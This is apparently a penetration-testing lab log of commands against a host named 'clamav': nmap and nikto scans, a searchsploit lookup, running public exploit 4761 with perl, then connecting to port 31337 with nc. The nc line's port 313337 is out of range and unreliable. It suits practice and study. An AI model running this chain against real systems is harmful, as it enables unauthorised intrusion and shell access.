nmap -A -p- -oA clamav 192.168.59.42 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA clamav 192.168.59.42
nmap -sU -O -p- -oA clamav-udp 192.168.59.42
nikto -h 192.168.59.42:80
searchsploit ClamAV
searchsploit -m 4761
perl 4761.pl 192.168.59.42
nmap -p31337 192.168.59.42
nc 192.168.59.42 313337